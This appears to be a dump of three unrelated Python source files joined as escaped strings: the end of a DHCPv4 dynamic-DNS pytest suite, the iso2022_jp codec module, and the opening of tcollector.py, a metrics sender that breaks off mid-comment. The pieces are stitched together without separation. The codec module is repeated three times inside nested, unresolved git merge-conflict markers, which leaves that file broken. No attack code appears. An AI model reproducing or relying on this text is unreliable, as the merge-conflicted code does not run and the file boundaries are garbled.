\'127.0.0.1.in-addr.arpa.\')\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.reverse_add\ndef test_ddns4_notsig_rev_success_withoutflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 0)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.reverse_add\ndef test_ddns4_notsig_rev_withoutflag_notenabled():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', False)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n # Response option 81 MUST contain flags 0. #later make it \'s\' \'n\' and \'o\' should be 10\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.reverse_add\ndef test_ddns4_notsig_rev_Nflag_override_no_update():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'override-no-update\', True)\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'N\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 3)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com.\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n', ""<<<<<<< HEAD\n<<<<<<< HEAD\n#\n# iso2022_jp.py: Python Unicode Codec for ISO2022_JP\n#\n# Written by Hye-Shik Chang dummy@email.com\n#\n\nimport _codecs_iso2022, codecs\nimport _multibytecodec as mbc\n\ncodec = _codecs_iso2022.getcodec('iso2022_jp')\n\nclass Codec(codecs.Codec):\n encode = codec.encode\n decode = codec.decode\n\nclass IncrementalEncoder(mbc.MultibyteIncrementalEncoder,\n codecs.IncrementalEncoder):\n codec = codec\n\nclass IncrementalDecoder(mbc.MultibyteIncrementalDecoder,\n codecs.IncrementalDecoder):\n codec = codec\n\nclass StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):\n codec = codec\n\nclass StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):\n codec = codec\n\ndef getregentry():\n return codecs.CodecInfo(\n name='iso2022_jp',\n encode=Codec().encode,\n decode=Codec().decode,\n incrementalencoder=IncrementalEncoder,\n incrementaldecoder=IncrementalDecoder,\n streamreader=StreamReader,\n streamwriter=StreamWriter,\n )\n=======\n#\n# iso2022_jp.py: Python Unicode Codec for ISO2022_JP\n#\n# Written by Hye-Shik Chang dummy@email.com\n#\n\nimport _codecs_iso2022, codecs\nimport _multibytecodec as mbc\n\ncodec = _codecs_iso2022.getcodec('iso2022_jp')\n\nclass Codec(codecs.Codec):\n encode = codec.encode\n decode = codec.decode\n\nclass IncrementalEncoder(mbc.MultibyteIncrementalEncoder,\n codecs.IncrementalEncoder):\n codec = codec\n\nclass IncrementalDecoder(mbc.MultibyteIncrementalDecoder,\n codecs.IncrementalDecoder):\n codec = codec\n\nclass StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):\n codec = codec\n\nclass StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):\n codec = codec\n\ndef getregentry():\n return codecs.CodecInfo(\n name='iso2022_jp',\n encode=Codec().encode,\n decode=Codec().decode,\n incrementalencoder=IncrementalEncoder,\n incrementaldecoder=IncrementalDecoder,\n streamreader=StreamReader,\n streamwriter=StreamWriter,\n )\n>>>>>>> PI:KEY\n=======\n#\n# iso2022_jp.py: Python Unicode Codec for ISO2022_JP\n#\n# Written by Hye-Shik Chang dummy@email.com\n#\n\nimport _codecs_iso2022, codecs\nimport _multibytecodec as mbc\n\ncodec = _codecs_iso2022.getcodec('iso2022_jp')\n\nclass Codec(codecs.Codec):\n encode = codec.encode\n decode = codec.decode\n\nclass IncrementalEncoder(mbc.MultibyteIncrementalEncoder,\n codecs.IncrementalEncoder):\n codec = codec\n\nclass IncrementalDecoder(mbc.MultibyteIncrementalDecoder,\n codecs.IncrementalDecoder):\n codec = codec\n\nclass StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):\n codec = codec\n\nclass StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):\n codec = codec\n\ndef getregentry():\n return codecs.CodecInfo(\n name='iso2022_jp',\n encode=Codec().encode,\n decode=Codec().decode,\n incrementalencoder=IncrementalEncoder,\n incrementaldecoder=IncrementalDecoder,\n streamreader=StreamReader,\n streamwriter=StreamWriter,\n )\n>>>>>>> PI:KEY\n"", '#!/usr/bin/env python\n# This file is part of tcollector.\n# Copyright (C) 2010 The tcollector Authors.\n#\n# This program is free software: you can redistribute it and/or modify it\n# under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or (at your\n# option) any later version. This program is distributed in the hope that it\n# will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser\n# General Public License for more details. You should have received a copy\n# of the GNU Lesser General Public License along with this program. If not,\n# see .\n#\n# tcollector.py\n#\n""""""Simple manager for collection scripts that run and gather data.\n The tcollector gathers the data and sends it to the TSD for storage.""""""\n#\n# by Mark Smith dummy@email.com.\n#\n\nimport atexit\nimport errno\nimport fcntl\nimport logging\nimport os\nimport random\nimport re\nimport signal\nimport socket\nimport subprocess\nimport sys\nimport threading\nimport time\nimport json\nimport urllib2\nimport base64\nfrom logging.handlers import RotatingFileHandler\nfrom Queue import Queue\nfrom Queue import Empty\nfrom Queue import Full\nfrom optparse import OptionParser\n\n\n# global variables.\nCOLLECTORS = {}\nGENERATION = 0\nDEFAULT_LOG = \'/var/log/tcollector.log\'\nLOG = logging.getLogger(\'tcollector\')\nALIVE = True\n# If the SenderThread catches more than this many consecutive uncaught\n# exceptions, something is not right and tcollector will shutdown.\n# Hopefully some kind of supervising daemon will then restart it.\nMAX_UNCAUGHT_EXCEPTIONS = 100\nDEFAULT_PORT = 4242\nMAX_REASONABLE_TIMESTAMP = 1600000000 # Good until September 2020 :)\n# How long to wait for datapoints before assuming\n# a collector is dead and restarting it\nALLOWED_INACTIVITY_TIME = 600 # seconds\nMAX_SENDQ_SIZE = 10000\nMAX_READQ_SIZE = 100000\n\n\ndef register_collector(collector):\n """"""Register a collector with the COLLECTORS global""""""\n\n assert isinstance(collector, Collector), ""collector=%r"" % (collector,)\n # store it in the global list and initiate a kill for anybody with the\n # same name that happens to still be hanging around\n if collector.name in COLLECTORS:\n col = COLLECTORS[collector.name]\n if col.proc is not None:\n LOG.error(\'%s still has a process (pid=%d) and is being reset,\'\n \' terminating\', col.name, col.proc.pid)\n col.shutdown()\n\n COLLECTORS[collector.name] = collector\n\n\nclass ReaderQueue(Queue):\n """"""A Queue for the reader thread""""""\n\n def nput(self, value):\n """"""A nonblocking put, that simply logs and discards the value when the\n queue is full, and returns false if we dropped.""""""\n try:\n self.put(value, False)\n except Full:\n LOG.error(""DROPPED LINE: %s"", value)\n return False\n return True\n\n\nclass Collector(object):\n """"""A Collector is a script that is run that gathers some data\n and prints it out in standard TSD format on STDOUT. This\n class maintains all of the state information for a given\n collector and gives us utility methods for working with\n it.""""""\n\n def __init__(self, colname, interval, filename, mtime=0, lastspawn=0):\n """"""Construct a new Collector.""""""\n self.name = colname\n self.interval = interval\n self.filename = filename\n self.lastspawn = lastspawn\n self.proc = None\n self.nextkill = 0\n self.killstate = 0\n self.dead = False\n self.mtime = mtime\n self.generation = GENERATION\n self.buffer = """"\n self.datalines = []\n # Maps (metric, tags) to (value, repeated, line, timestamp) where:\n # value: Last value seen.\n # repeated: boolean, whether the last value was seen more than once.\n # line: The last line that was read from that collector.\n # timestamp: Time at which we saw the value for the first time.\n # This dict is used to keep track of and remove duplicate values.\n # Since it might grow unbounded (in case we see many different\n # combinations of metrics and tags) someone needs to regularly call\n # evict_old_keys() to remove old entries.\n self.values = {}\n self.lines_sent = 0\n self.lines_received = 0\n self.lines_invalid = 0\n self.last_datapoint = int(time.time())\n\n def read(self):\n """"""Read bytes from our subprocess and store them in our temporary\n line storage buffer. This needs to be non-blocking.""""""\n\n # we have to use a buffer because sometimes the collectors\n # will write out a bunch of data points at one time and we\n # get some weird sized chunk. This read call is non-blocking.\n\n # now read stderr for log messages, we could buffer here but since\n # we\'re just logging the messages, I don\'t care to\n try:\n out = self.proc.stderr.read()\n if out:\n LOG.debug(\'reading %s got %d bytes on stderr\',\n self.name, len(out))\n for line in out.splitlines():\n LOG.warning(\'%s: %s\', self.name, line)\n except IOError, (err, msg):\n if err != errno.EAGAIN:\n raise\n except:\n LOG.exception(\'uncaught exception in stderr read\')\n\n # we have to use a buffer because sometimes the collectors will write\n # out a bunch of data points at one time and we get some weird sized\n # chunk. This read call is non-blocking.\n try:\n self.buffer += self.proc.stdout.read()\n if len(self.buffer):\n LOG.debug(\'reading %s, buffer now %d bytes\',\n self.name, len(self.buffer))\n except IOError, (err, msg):\n if err != errno.EAGAIN:\n raise\n except AttributeError:\n # sometimes the process goes away in another thread and we don\'t\n # have it anymore, so log an error and bail\n LOG.exception(\'caught exception, collector process went away while reading stdout\')\n except:\n LOG.exception(\'uncaught exception in stdout read\')\n return\n\n # iterate for each line we have\n while self.buffer:\n idx = self.buffer.find(\'\\n\')\n if idx == -1:\n break\n\n # one full line is now found and we can pull it out of the buffer\n line = self.buffer[0:idx].strip()\n if line:\n self.datalines.append(line)\n self.last_datapoint = int(time.time())\n self.buffer = self.buffer[idx+1:]\n\n def collect(self):\n """"""Reads input from the collector and returns the lines up to whomever\n is calling us. This is a generator that returns a line as it\n becomes available.""""""\n\n while self.proc is not None:\n self.read()\n if not len(self.datalines):\n return\n while len(self.datalines):\n yield self.datalines.pop(0)\n\n def shutdown(self):\n """"""Cleanly shut down the collector""""""\n\n if not self.proc:\n return\n try:\n if self.proc.poll() is None:\n kill(self.proc)\n for attempt in range(5):\n if self.proc.poll() is not None:\n return\n LOG.info(\'Waiting %ds for PID %d (%s) to exit...\'\n % (5 - attempt, self.proc.pid, self.name))\n time.sleep(1)\n kill(self.proc, signal.SIGKILL)\n self.proc.wait()\n except:\n # we really don\'t want to die as we\'re trying to exit gracefully\n LOG.exception(\'ignoring uncaught exception while shutting down\')\n\n def evict_old_keys(self, cut_off):\n """"""Remove old entries from the cache used to detect duplicate values.\n\n Args:\n cut_off: A UNIX timestamp. Any value that\'s older than this will be\n removed from the cache.\n """"""\n for key in self.values.keys():\n time = self.values[key][3]\n if time < cut_off:\n del self.values[key]\n\n\nclass StdinCollector(Collector):\n """"""A StdinCollector simply reads from STDIN and provides the\n data. This collector presents a uniform interface for the\n ReaderThread, although unlike a normal collector, read()/collect()\n will be blocking.""""""\n\n def __init__(self):\n super(StdinCollector, self).__init__(\'stdin\', 0, \'\')\n\n # hack to make this work. nobody else will rely on self.proc\n # except as a test in the stdin mode.\n self.proc = True\n\n def read(self):\n """"""Read lines from STDIN and store them. We allow this to\n be blocking because there should only ever be one\n StdinCollector and no normal collectors, so the ReaderThread\n is only serving us and we\'re allowed to block it.""""""\n\n global ALIVE\n line = sys.stdin.readline()\n if line:\n self.datalines.append(line.rstrip())\n else:\n ALIVE = False\n\n\n def shutdown(self):\n\n pass\n\n\nclass ReaderThread(threading.Thread):\n """"""The main ReaderThread is responsible for reading from the collectors\n and assuring that we always read from the input no matter what.\n All data read is put into the self.readerq Queue, which is\n consumed by the SenderThread.""""""\n\n def __init__(self, dedupinterval, evictinterval):\n """"""Constructor.\n Args:\n dedupinterval: If a metric sends the same value over successive\n intervals, suppress sending the same value to the TSD until\n this many seconds have elapsed. This helps graphs over narrow\n time ranges still see timeseries with suppressed datapoints.\n evictinterval: In order to implement the behavior above, the\n code needs to keep track of the last value seen for each\n combination of (metric, tags). Values older than\n evictinterval will be removed from the cache to save RAM.\n Invariant: evictinterval > dedupinterval\n """"""\n assert evictinterval > dedupinterval, ""%r <= %r"" % (evictinterval,\n dedupinterval)\n super(ReaderThread, self).__init__()\n\n self.readerq = ReaderQueue(MAX_READQ_SIZE)\n self.lines_collected = 0\n self.lines_dropped = 0\n self.dedupinterval = dedupinterval\n self.evictinterval = evictinterval\n\n def run(self):\n """"""Main loop for this thread. Just reads from collectors,\n does our input processing and de-duping, and puts the data\n into the queue.""""""\n\n LOG.debug(""ReaderThread up and running"")\n\n lastevict_time = 0\n # we loop every second for now. ideally we\'ll setup some\n # select or other thing to wait for input on our children,\n # while breaking out every once in a while to setup selects\n # on new children.\n while ALIVE:\n for col in all_living_collectors():\n for line in col.collect():\n self.process_line(col, line)\n\n if self.dedupinterval != 0: # if 0 we do not use dedup\n now = int(time.time())\n if now - lastevict_time > self.evictinterval:\n lastevict_time = now\n now -= self.evictinterval\n for col in all_collectors():\n col.evict_old_keys(now)\n\n # and here is the loop that we really should get rid of, this\n # just prevents us from spinning right now\n time.sleep(1)\n\n def process_line(self, col, line):\n """"""Parses the given line and appends the result to the reader queue.""""""\n\n self.lines_collected += 1\n\n col.lines_received += 1\n if len(line) >= 1024: # Limit in net.opentsdb.tsd.PipelineFactory\n LOG.warning(\'%s line too long: %s\', col.name, line)\n col.lines_invalid += 1\n return\n parsed = re.match(\'^([-_./a-zA-Z0-9]+)\\s+\' # Metric name.\n \'(\\d+\\.?\\d+)\\s+\' # Timestamp.\n \'(\\S+?)\' # Value (int or float).\n \'((?:\\s+[-_./a-zA-Z0-9]+=[-_./a-zA-Z0-9]+)*)$\', # Tags\n line)\n if parsed is None:\n LOG.warning(\'%s sent invalid data: %s\', col.name, line)\n col.lines_invalid += 1\n return\n metric, timestamp, value, tags = parsed.groups()\n timestamp = int(timestamp)\n\n # If there are more than 11 digits we\'re dealing with a timestamp\n # with millisecond precision\n if len(str(timestamp)) > 11:\n global MAX_REASONABLE_TIMESTAMP\n MAX_REASONABLE_TIMESTAMP = MAX_REASONABLE_TIMESTAMP * 1000\n\n # De-dupe detection... To reduce the number of points we send to the\n # TSD, we suppress sending values of metrics that don\'t change to\n # only once every 10 minutes (which is also when TSD changes rows\n # and how much extra time the scanner adds to the beginning/end of a\n # graph interval in order to correctly calculate aggregated values).\n # When the values do change, we want to first send the previous value\n # with what the timestamp was when it first became that value (to keep\n # slopes of graphs correct).\n #\n if self.dedupinterval != 0: # if 0 we do not use dedup\n key = (metric, tags)\n if key in col.values:\n # if the timestamp isn\'t > than the previous one, ignore this value\n if timestamp <= col.values[key][3]:\n LOG.error(""Timestamp out of order: metric=%s%s,""\n "" old_ts=%d >= new_ts=%d - ignoring data point""\n "" (value=%r, collector=%s)"", metric, tags,\n col.values[key][3], timestamp, value, col.name)\n col.lines_invalid += 1\n return\n elif timestamp >= MAX_REASONABLE_TIMESTAMP:\n LOG.error(""Timestamp is too far out in the future: metric=%s%s""\n "" old_ts=%d, new_ts=%d - ignoring data point""\n "" (value=%r, collector=%s)"", metric, tags,\n col.values[key][3], timestamp, value, col.name)\n return\n\n # if this data point is repeated, store it but don\'t send.\n # store the previous timestamp, so when/if this value changes\n # we send the timestamp when this metric first became the current\n # value instead of the last. Fall through if we reach\n # the dedup interval so we can print the value.\n if (col.values[key][0] == value and\n (timestamp - col.values[key][3] < self.dedupinterval)):\n col.values[key] = (value, True, line, col.values[key][3])\n return\n\n # we might have to append two lines if the value has been the same\n # for a while and we\'ve skipped one or more values. we need to\n # replay the last value we skipped (if changed) so the jumps in\n # our graph are accurate,\n if ((col.values[key][1] or\n (timestamp - col.values[key][3] >= self.dedupinterval))\n and col.values[key][0] != value):\n col.lines_sent += 1\n if not self.readerq.nput(col.values[key][2]):\n self.lines_dropped += 1\n\n # now we can reset for the next pass and send the line we actually\n # want to send\n # col.values is a dict of tuples, with the key being the metric and\n # tags (essentially the same as wthat TSD uses for the row key).\n # The array consists of:\n # [ the metric\'s value, if this value was repeated, the line of data,\n # the value\'s timestamp that it last changed ]\n col.values[key] = (value, False, line, timestamp)\n\n col.lines_sent += 1\n if not self.readerq.nput(line):\n self.lines_dropped += 1\n\n\nclass SenderThread(threading.Thread):\n """"""The SenderThread is responsible for maintaining a connection\n to the TSD and sending the data we\'re getting over to it. This\n thread is also responsible for doing any sort of emergency\n buffering we might need to do if we can\'t establish a connection\n and we need to spool to disk. That isn\'t implemented yet.""""""\n\n def __init__(self, reader, dryrun, hosts, self_report_stats, tags,\n reconnectinterval=0, http=False, http_username=None,\n http_password=None, ssl=False, maxtags=8):\n """"""Constructor.\n\n Args:\n reader: A reference to a ReaderThread instance.\n dryrun: If true, data points will be printed on stdout instead of\n being sent to the TSD.\n hosts: List of (host, port) tuples defining list of TSDs\n self_report_stats: If true, the reader thread will insert its own\n stats into the metrics reported to TSD, as if those metrics had\n been read from a collector.\n http: A boolean that controls whether or not the http endpoint is used.\n ssl: A boolean that controls whether or not the http endpoint uses ssl.\n tags: A dictionary of tags to append for every data point.\n """"""\n super(SenderThread, self).__init__()\n\n self.dryrun = dryrun\n self.reader = reader\n self.tags = sorted(tags.items()) # dictionary transformed to list\n self.http = http\n self.http_username = http_username\n self.http_password = http_password\n self.ssl = ssl\n self.hosts = hosts # A list of (host, port) pairs.\n # Randomize hosts to help even out the load.\n random.shuffle(self.hosts)\n self.blacklisted_hosts = set() # The \'bad\' (host, port) pairs.\n self.current_tsd = -1 # Index in self.hosts where we\'re at.\n self.host = None # The current TSD host we\'ve selected.\n self.port = None # The port of the current TSD.\n self.tsd = None # The socket connected to the aforementioned TSD.\n self.last_verify = 0\n self.reconnectinterval = reconnectinterval # in seconds.\n self.time_reconnect = 0 # if reconnectinterval > 0, used to track the time.\n self.sendq = []\n self.self_report_stats = self_report_stats\n self.maxtags = maxtags # The maximum number of tags TSD will accept.\n\n def pick_connection(self):\n """"""Picks up a random host/port connection.""""""\n # Try to get the next host from the list, until we find a host that\n # isn\'t in the blacklist, or until we run out of hosts (i.e. they\n # are all blacklisted, which typically happens when we lost our\n # connectivity to the outside world).\n for self.current_tsd in xrange(self.current_tsd + 1, len(self.hosts)):\n hostport = self.hosts[self.current_tsd]\n if hostport not in self.blacklisted_hosts:\n break\n else:\n LOG.info(\'No more healthy hosts, retry with previously blacklisted\')\n random.shuffle(self.hosts)\n self.blacklisted_hosts.clear()\n self.current_tsd = 0\n hostport = self.hosts[self.current_tsd]\n self.host, self.port = hostport\n LOG.info(\'Selected connection: %s:%d\', self.host, self.port)\n\n def blacklist_connection(self):\n """"""Marks the current TSD host we\'re trying to use as blacklisted.\n\n Blacklisted hosts will get another chance to be elected once there\n will be no more healthy hosts.""""""\n # FIXME: Enhance this naive strategy.\n LOG.info(\'Blacklisting %s:%s for a while\', self.host, self.port)\n self.blacklisted_hosts.add((self.host, self.port))\n\n def run(self):\n """"""Main loop. A simple scheduler. Loop waiting for 5\n seconds for data on the queue. If there\'s no data, just\n loop and make sure our connection is still open. If there\n is data, wait 5 more seconds and grab all of the pending data and\n send it. A little better than sending every line as its\n own packet.""""""\n\n errors = 0 # How many uncaught exceptions in a row we got.\n while ALIVE:\n try:\n self.maintain_conn()\n try:\n line = self.reader.readerq.get(True, 5)\n except Empty:\n continue\n self.sendq.append(line)\n time.sleep(5) # Wait for more data\n while True:\n # prevents self.sendq fast growing in case of sending fails\n # in send_data()\n if len(self.sendq) > MAX_SENDQ_SIZE:\n break\n try:\n line = self.reader.readerq.get(False)\n except Empty:\n break\n self.sendq.append(line)\n\n if ALIVE:\n self.send_data()\n errors = 0 # We managed to do a successful iteration.\n except (ArithmeticError, EOFError, EnvironmentError, LookupError,\n ValueError), e:\n errors += 1\n if errors > MAX_UNCAUGHT_EXCEPTIONS:\n shutdown()\n raise\n LOG.exception(\'Uncaught exception in SenderThread, ignoring\')\n time.sleep(1)\n continue\n except:\n LOG.exception(\'Uncaught exception in SenderThread, going to exit\')\n shutdown()\n raise\n\n def verify_conn(self):\n """"""Periodically verify that our connection to the TSD is OK\n and that the TSD is alive/working.""""""\n # http connections don\'t need this\n if self.http:\n return True\n\n if self.tsd is None:\n return False\n\n # if the last verification was less than a minute ago, don\'t re-verify\n if self.last_verify > time.time() - 60:\n return True\n\n # in case reconnect is activated, check if it\'s time to reconnect\n if self.reconnectinterval > 0 and self.time_reconnect < time.time() - self.reconnectinterval:\n # closing the connection and indicating that we need to reconnect.\n try:\n self.tsd.close()\n except socket.error, msg:\n pass # not handling that\n self.time_reconnect = time.time()\n return False\n\n # we use the version command as it is very low effort for the TSD\n # to respond\n LOG.debug(\'verifying our TSD connection is alive\')\n try:\n self.tsd.sendall(\'version\\n\')\n except socket.error, msg:\n self.tsd = None\n self.blacklist_connection()\n return False\n\n bufsize = 4096\n while ALIVE:\n # try to read as much data as we can. at some point this is going\n # to block, but we have set the timeout low when we made the\n # connection\n try:\n buf = self.tsd.recv(bufsize)\n except socket.error, msg:\n self.tsd = None\n self.blacklist_connection()\n return False\n\n # If we don\'t get a response to the `version\' request, the TSD\n # must be dead or overloaded.\n if not buf:\n self.tsd = None\n self.blacklist_connection()\n return False\n\n # Woah, the TSD has a lot of things to tell us... Let\'s make\n # sure we read everything it sent us by looping once more.\n if len(buf) == bufsize:\n continue\n\n # If everything is good, send out our meta stats. This\n # helps to see what 